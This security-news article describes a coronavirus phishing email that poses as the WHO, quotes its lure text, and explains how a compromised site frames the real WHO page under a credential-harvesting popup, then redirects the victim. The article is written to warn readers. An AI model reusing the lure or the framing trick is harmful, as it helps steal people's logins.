Coronavirus “safety measures” email is a phishing scam

Thanks to the Sophos Security Team for their help with this article.

Sadly, cybercrooks love a crisis, because it gives them a believable reason to contact you with a phishing scam.

Here’s a tasteless and exploitative example, reported to us by the Sophos Security Team, of a current scam that uses the coronavirus as its lure:

The email, which carries the logo of the World Health Organization states:

Go through the attached document on safety measures regarding the spreading of corona virus.

Click on the button below to download

Symptoms common symptoms include fever,coughcshortness of breath and breathing difficulties.

Fortunately, at least for fluent speakers of English, the criminals have made numerous spelling and grammatical mistakes that act as warning signs that this is not what it seems.

The link you’re asked to click on is similarly, and fortunately, dubious.

Firstly, it seems to be a compromised music site with a weird name that doesn’t have any obvious connection to any well-known health organisation; secondly, it is an HTTP site, not an HTTPS site, which is sufficiently unusual these days to be suspicious in its own right.

Nevertheless, the scam page itself is incredibly simple – it can’t have taken the crooks more than a few minutes to put together – and visually effective.

The fake page consists of the official, current home page of the World Health Organisation (WHO) , with an unassuming popup form on top of it.

It doesn’t just look like the WHO’s page in the background, it is the WHO’s page, rendered in a frame that’s embedded in the fake site:

You can see why someone who’s nervous about the coronavirus issue, or who has friends and family in the main areas of infection, or who wants to do the right thing by learning more about preventing the spread of the disease…

…might fill in the form, perhaps because they are feeling pressurised by (or not thinking clearly because of) the subject matter.

Indeed, many companies have already sent emails to their staff to offer advice, so reading additional information that is allegedly from the WHO sounds like a sensible and responsible thing to do.

Of course, if you put in your email address or your password and click through, you’ll be submitting the filled-in web form to the crooks.

Worse still, you’ll be submitting it over an unencrypted connection.

So anyone else on the same network as you, for example in your hotel lobby or the coffee shop, could potentially capture your network traffic and see the username and password you just put in.

Once you’ve clicked the [Verify] button, the crooks simply redirect you to the real WHO site at who DOT int, which looks just like the previous page you were on, minus the popup form…

…with the rather obvious exception that the address bar now looks (and is) correct, displaying the genuine WHO website name, showing a padlock and – if you click through and view the web certificate – a certificate that shows up as issued to the WHO itself.

What to do?


Latest Naked Security podcast

LISTEN NOW

Click-and-drag on the soundwaves below to skip to any point in the podcast. You can also listen directly on Soundcloud.